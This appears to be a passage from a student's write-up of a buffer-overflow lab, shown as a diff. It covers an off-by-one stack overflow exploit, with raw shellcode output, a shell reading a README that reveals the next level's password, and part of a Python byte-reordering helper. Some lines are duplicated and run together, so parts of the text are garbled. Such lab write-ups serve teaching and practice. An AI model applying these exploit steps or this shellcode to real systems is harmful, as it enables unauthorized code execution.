@@ -149,3 +149,77 @@ b = binascii.unhexlify(payload)
...
@@ -149,3 +149,77 @@ b = binascii.unhexlify(payload)
withopen('/dev/fd/1','wb')asf:
withopen('/dev/fd/1','wb')asf:
f.write(b)
f.write(b)
```
```
## 3
The question is off-by-one overflow problem. After reading aslr.pdf figure 30, I know that I should set %ebp to &buf[0] (0xbffffa40), and put the new return address in &buf[1], and put the payload. So I should overflow an "40" to %ebp. Now I'll do it.
However, after implementing the solution above, ./debug-exploit works but ./exploit doesn't. That's because overflowed "0x40" xor "1<<5" yields "`", which is beaking the shell (in the buggy exploit script). So I shift everything 4 bytes right. Now %ebp is set to &buf[1] and new return address is set to &buf[2] and overflowed byte is "44". Now everything is OK.
```
pwnable:~$ ./exploit
#Eg#EgL���j1X̀�É�jFX̀1�Ph//shh/binT[PS��1Ұ
D���9���'�������]���'��� ���4���
/home/brown $ cat README
Remember, all I'm offering is the truth. Nothing more.
Next username: jz
Next password: cqkeuevfIO
```
My `./arg` is still attached below. Note that my `./egg` is empty.
```
#!/usr/bin/python3
def fuck8(txt):
assert(len(txt) == 8)
return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
def revert(txt):
assert(len(txt) % 8 == 0)
res = ""
for i in range(int(len(txt) / 8)):
res += fuck8(txt[i*8:(i+1)*8])
return res
## The FUCKING silly script booms the shell because overflow="40"="`".
